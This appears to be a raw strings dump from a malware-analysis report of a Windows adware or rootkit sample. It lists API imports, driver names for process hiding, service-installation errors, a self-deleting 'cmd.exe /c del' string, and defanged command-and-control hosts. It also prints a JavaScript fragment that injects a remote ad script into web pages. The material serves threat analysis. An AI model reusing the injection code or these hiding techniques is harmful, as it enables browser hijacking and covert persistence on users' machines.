.PAVCException@@
.?AVCCmdUI@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCUserException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.?AVCTestCmdUI@@
c:\%original file name%.exe
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
CreateDialogIndirectParamA
SetWindowsHookExA
GetKeyState
UnhookWindowsHookEx
pr.Gxz
1.WfM^R
ATL.DLL
COMCTL32.dll
GDI32.dll
OLEAUT32.dll
oledlg.dll
WINSPOOL.DRV
2015.1.20.1
2.0.0.1
1, 5, 1, 1516
1, 0, 0, 444
\Driver\Tcpip
%original file name%.exe_996_rwx_00401000_000C7000:
f9z.vk
CCmdTarget
CNotSupportedException
commctrl_DragListMsg
COMCTL32.DLL
ole32.dll
__MSVCRT_HEAP_SELECT
user32.dll
omdlg32.dll
SHELL32.dll
OLEPRO32.DLL
WINMM.dll
svchost.exe
.rsrc
P%dTh[
En.yGW
.Kh)"
D.UnQ
!.IB?S
%Sioj
.aMOY
5E.axf
.IMpg
3m.be
~]%%dH
$.na\
ðuz
%xvfR
14.NeDY
i.MIE
38.TF
`L?.tt?c
|&.MG:
w.JtO
a.iNh5
: ).BE
-..zFI
.JKGek
7.aVc
C .nG
KERNEL32.DLL
ADVAPI32.dll
IPHLPAPI.DLL
MSWSOCK.dll
PSAPI.DLL
SHLWAPI.dll
USER32.dll
VERSION.dll
WININET.dll
WS2_32.dll
RegCloseKey
ShellExecuteW
.text
`.rdata
@.data
t.Fj)V
?456789:;
!"#$%&'()* ,-./0123
(3-!0,1'8"5.*2$
\\.\SSDTProcess
HideSys.sys
\\.\FixTool
Restore.sys
GetProcessHeap
WinExec
KERNEL32.dll
RegOpenKeyExA
RegEnumKeyExA
RegQueryInfoKeyA
RegFlushKey
RegCreateKeyExA
iphlpapi.dll
UrlUnescapeA
InternetCrackUrlA
InternetCanonicalizeUrlA
GetCPInfo
WINDOWS\
F5A937EE-621D-4F66-8020-AB9D5FA1C357
first.exe
bytes=%d-%d
bytes=%d-
HTTP/
HTTP/
XXXXXX
%s\Connection
SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
ddddddd
flist.bin
cmd.exe /c del
XXXXXXXXXXXXXXXX
hXXp://
ATL:X
msvcrt
ShellExecuteExA
ShellExecuteExW
OpenWindowStationA
OpenWindowStationW
SetProcessWindowStation
GetProcessWindowStation
CloseWindowStation
EnumWindows
EnumThreadWindows
EnumChildWindows
RegOpenKeyExW
RegEnumKeyExW
RegDeleteKeyA
RegDeleteKeyW
HttpOpenRequestA
HttpOpenRequestW
HttpEndRequestA
HttpEndRequestW
HttpQueryInfoA
HttpQueryInfoW
UrlUnescapeW
TenSafe_1.exe
TenSafe.exe
CreateService Fail %x
OpenSCManager Fail %x
KStartServices end x
QueryServiceStatus Fail %x
QueryServiceStatus x
StartService~ x
115.238.251.56
log.soomeng.com
VVV.4278.cn
log.zzinfor.cn
127.0.0.1
zcÃ
h.rdata
H.data
.reloc
E:\CODE_P~1\p2p\HideSys\objfre\i386\HideSys.pdb
ntoskrnl.exe
hxdnetmon.sys
E:\New\MINIEP~4\sys\Driver\objfre\i386\FixTool.pdb
HAL.dll
hXXp://VVV.92zy.com/asb/apro.jpg
92tezheng.ma
WinHttp.WinHttpRequest.5.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Content-Type: application/x-www-form-urlencoded
{00000117-0000-0000-C000-000000000046}
ntdll.dll
gdi32.dll
adpro.cn
163.com
126.com
baidu.com
123.sogou.com
hXXps://
VVV.sohu.com
VVV.sina.com
hao123.com
tmall.com
if (!document.body) return setTimeout(arguments.callee, 100);
var adpro= document.createElement('script');
adpro.type = 'text/javascript';
adpro.text = '_adpro_pub= "9959fcb4681e1d19d755";';
adpro.text = '_adpro_slot= "0bbbc79f00c47aa6e562";';
document.body.insertBefore(adpro, document.body.children.item(0));
adpro.src = 'hXXp://m.adpro.cn/adpro.js';
Test
D@ole32.dll
atl.dll
kernel32.dll
Kernel32.dll
program internal error number is %d.
:"%s"
:"%s".
.?AVCCmdTarget@@
.PAVCException@@
.?AVCCmdUI@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCUserException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.?AVCTestCmdUI@@
c:\%original file name%.exe
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
CreateDialogIndirectParamA
SetWindowsHookExA
GetKeyState
UnhookWindowsHookEx
pr.Gxz
1.WfM^R
2015.1.20.1
2.0.0.1
1, 5, 1, 1516
1, 0, 0, 444
\Driver\Tcpip
svchost.exe_3088:
.text
`.rdata
@.data
.rsrc
@.reloc
j.Yf;
_tcPVj@
.PjRW
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
0123456789-
%b %d %H : %M : %S %Y
%m / %d / %y
%I : %M : %S %p
%d / %m / %y
cmd.exe
GetProcessWindowStation
operator
MaxPolicyElementKey
pExecutionResource
e:\work\hera\src\common\norm\include\norm\third_party\jsonxx.h
[JSONXX] expression '%s' failed at %s:%d ->
HTTP/1.0 200 OK
Server: HTTPServ/1.0
Content-Type: %s
Content-Length: %d
HTTP/1.0 404 NOT FOUND